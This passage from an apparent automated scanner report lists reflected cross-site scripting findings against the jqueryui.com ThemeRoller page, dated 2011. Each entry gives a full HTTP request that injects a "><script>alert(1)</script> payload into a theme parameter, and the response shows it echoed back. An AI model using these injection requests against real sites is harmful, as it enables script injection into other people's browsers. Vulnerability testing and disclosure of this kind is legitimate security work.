r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png18966"><script>alert(1)</script>76f50b8c74f&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

1.135. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45aa"><script>alert(1)</script>5e1a910598 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngf45aa"><script>alert(1)</script>5e1a910598&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119999

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngf45aa"><script>alert(1)</script>5e1a910598&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.136. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56912"><script>alert(1)</script>cb967ee3044 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png56912"><script>alert(1)</script>cb967ee3044&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png56912"><script>alert(1)</script>cb967ee3044&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

1.137. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef5cf"><script>alert(1)</script>848687395fd was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngef5cf"><script>alert(1)</script>848687395fd&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngef5cf"><script>alert(1)</script>848687395fd&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.138. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f226"><script>alert(1)</script>12c5cb4ea52 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png8f226"><script>alert(1)</script>12c5cb4ea52&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png8f226"><script>alert(1)</script>12c5cb4ea52&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

1.139. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5920"><script>alert(1)</script>0da440e482d was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga5920"><script>alert(1)</script>0da440e482d&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga5920"><script>alert(1)</script>0da440e482d&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.140. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aed5"><script>alert(1)</script>c7a43f5d90f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1aed5"><script>alert(1)</script>c7a43f5d90f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1aed5"><script>alert(1)</script>c7a43f5d90f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.141. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e26"><script>alert(1)</script>dd6062138ed was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa14e26"><script>alert(1)</script>dd6062138ed&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa14e26"><script>alert(1)</script>dd6062138ed&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

1.142. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0563"><script>alert(1)</script>fc3d1d00bb8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaad0563"><script>alert(1)</script>fc3d1d00bb8&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaad0563"><script>alert(1)</script>fc3d1d00bb8&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

1.143. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 982d9"><script>alert(1)</script>55b8ae64af1 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3982d9"><script>alert(1)</script>55b8ae64af1&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3982d9"><script>alert(1)</script>55b8ae64af1&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

1.144. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a776"><script>alert(1)</script>659f328534c was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

